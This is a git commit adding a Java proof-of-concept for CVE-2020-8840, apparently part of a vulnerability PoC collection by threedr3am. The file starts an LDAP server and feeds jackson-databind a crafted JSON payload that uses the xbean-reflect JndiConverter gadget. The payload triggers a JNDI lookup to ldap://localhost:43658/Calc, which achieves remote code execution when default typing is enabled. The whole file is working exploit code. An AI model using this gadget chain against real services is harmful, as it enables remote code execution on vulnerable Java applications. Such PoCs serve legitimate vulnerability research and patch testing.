feat:增加jackson xbean-reflect（CVE-2020-8840）poc

threedr3am · threedr3am · commit c97f2928b901 · 2020-02-16T17:22:25.000+08:00
xbean-reflect依赖gadget
diff --git a/src/main/java/com/threedr3am/bug/jackson/JndiConverterPoc.java b/src/main/java/com/threedr3am/bug/jackson/JndiConverterPoc.java
@@ -0,0 +1,40 @@
+package com.threedr3am.bug.jackson;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.threedr3am.bug.server.LdapServer;
+import java.io.IOException;
+
+/**
+ *
+ * jackson-databind <= 2.10.2 RCE，需要开启DefaultType
+ *
+ * CVE-2020-8840
+ *
+ * XBean-reflect依赖的gadget
+ *
+ * <dependency>
+ *       <groupId>org.apache.xbean</groupId>
+ *       <artifactId>xbean-reflect</artifactId>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class JndiConverterPoc {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws IOException {
+    ObjectMapper mapper = new ObjectMapper();
+    mapper.enableDefaultTyping();
+
+    String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:43658/Calc\"}]";
+    mapper.readValue(json, Object.class);
+  }
+
+}
